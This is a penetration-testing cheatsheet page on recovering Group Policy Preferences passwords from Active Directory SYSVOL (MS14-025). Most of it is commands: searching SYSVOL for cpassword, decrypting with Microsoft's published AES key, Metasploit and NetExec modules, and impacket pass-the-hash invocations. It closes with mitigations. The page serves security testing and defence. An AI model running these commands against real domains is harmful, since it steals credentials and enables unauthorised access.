daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pwd-group-policy-preferences.md (2894B)


      1 ---
      2 title: "Password - Group Policy Preferences"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/pwd-group-policy-preferences.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-group-policy-preferences.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Password - Group Policy Preferences
     12 
     13 Find passwords in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.
     14 
     15 ```powershell
     16 findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
     17 ```
     18 
     19 Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx)
     20 
     21 ```bash
     22 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
     23 
     24 e.g: 
     25 echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
     26 
     27 echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
     28 ```
     29 
     30 ## Automate the SYSVOL and passwords research
     31 
     32 * `Metasploit` modules to enumerate shares and credentials
     33 
     34     ```c
     35     scanner/smb/smb_enumshares
     36     post/windows/gather/enum_shares
     37     post/windows/gather/credentials/gpp
     38     ```
     39 
     40 * NetExec modules
     41 
     42     ```powershell
     43     nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin
     44     nxc smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
     45     ```
     46 
     47 * [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py)
     48 
     49   ```powershell
     50   # with a NULL session
     51   Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
     52 
     53   # with cleartext credentials
     54   Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
     55 
     56   # pass-the-hash
     57   Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
     58   ```
     59 
     60 ## Mitigations
     61 
     62 * Install [KB2962486](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025) on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
     63 * Delete existing GPP xml files in SYSVOL containing passwords.
     64 * Don’t put passwords in files that are accessible by all authenticated users.
     65 
     66 ## References
     67 
     68 * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)